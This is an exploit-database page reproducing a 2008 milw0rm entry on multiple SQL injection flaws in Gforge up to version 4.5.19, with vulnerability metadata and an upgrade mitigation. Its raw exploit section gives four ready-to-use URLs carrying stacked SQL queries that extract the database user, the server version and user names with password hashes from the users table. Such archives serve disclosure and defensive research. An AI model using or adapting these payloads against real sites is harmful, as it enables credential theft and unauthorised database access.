Gforge - exploit.company

vendor:

Gforge

by:

milw0rm.com

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Gforge

Affected Version From: <= 4.5.19

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: a:gforge:gforge

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Gforge <= 4.5.19 Multiple Sql Injections

Gforge versions prior to 4.5.19 are vulnerable to multiple SQL injection vulnerabilities. An attacker can exploit these vulnerabilities to gain access to sensitive information such as user credentials, system information, etc. The vulnerabilities can be exploited regardless of the magic_quotes_gpc setting.

Mitigation:

Upgrade to Gforge version 4.5.19 or later.

Source

Exploit-DB raw data:

Gforge <= 4.5.19 Multiple Sql Injections

Vendor Notified: 2008-10-06
Note: should work regardless magic_quotes_gpc setting.

http://gforgesite.xxx/new/?group_id=&limit=50&offset=50;select 1 as id,CURRENT_USER as forum_id, version() as summary
http://gforgesite.xxx/news/?group_id=&limit=50&offset=50;select+1+as+id,unix_pw+as+forum_id,+user_name||unix_pw+as+summary+from+users
http://gforgesite.xxx/top/topusers.php?offset=0;select+1,version()+as+user_name,3,4,5;

Replace 1337 with a valid group_id:

http://gforgesite.xxx/frs/shownotes.php?release_id=*/+--+454&pub_sql=;select+1+as+is_public,1337+as+group_id,current_user+as+name,4+as+notes,version()+as+changes,6;/*

# milw0rm.com [2008-10-09]